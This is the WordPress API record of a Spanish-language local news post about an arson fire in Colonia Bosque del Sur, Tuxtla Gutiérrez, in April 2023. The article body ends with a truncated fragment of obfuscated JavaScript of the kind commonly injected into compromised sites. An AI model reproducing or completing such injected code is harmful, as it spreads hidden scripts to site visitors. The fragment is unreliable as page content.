{"id":9826,"date":"2023-04-29T04:03:14","date_gmt":"2023-04-29T04:03:14","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9826"},"modified":"2023-04-29T04:03:18","modified_gmt":"2023-04-29T04:03:18","slug":"se-registra-incendio-en-bosques-del-sur","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9826","title":{"rendered":"Se registra incendio en Bosques del Sur"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682740719838.jpg\" alt=\"\" class=\"wp-image-9827\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682740719838.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682740719838-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 28 de abril del 2023. Tuxtla Guti\u00e9rrez.- Este viernes cerca del medio d\u00eda, se registr\u00f3 un incendio en la Colonia Bosque del Sur de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando un sujeto prendi\u00f3 fuego a un predio ubicado en la Avenida El Roble, y calle Morelos e inmediatamente se propag\u00f3 hasta una propiedad donde hab\u00eda una palapa de palma y madera as\u00ed como un terreno de aproximadamente 50 metros cuadrados.<\/p>\n\n\n\n<p>Al lugar arribaron elementos del Cuerpo de Bomberos de la estaci\u00f3n poniente para atacar el incendio con equipo Especializado y despu\u00e9s de algunos minutos lograron apagarlo.<\/p>\n\n\n\n<p>A este punto no se present\u00f3 autoridad alguna, a pesar de que, el incendio fue provocado.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 28 de abril del 2023. Tuxtla Guti\u00e9rrez.- Este viernes cerca del medio d\u00eda, se registr\u00f3 un incendio en la Colonia Bosque del Sur de Tuxtla Guti\u00e9rrez. De acuerdo con los reportes oficiales este hecho ocurri\u00f3 cuando un sujeto prendi\u00f3 fuego a un predio ubicado en la Avenida El Roble, y calle &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9827,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9826","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9826","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9826"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9826\/revisions"}],"predecessor-version":[{"id":9828,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9826\/revisions\/9828"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9827"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9826"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9826"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9826"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}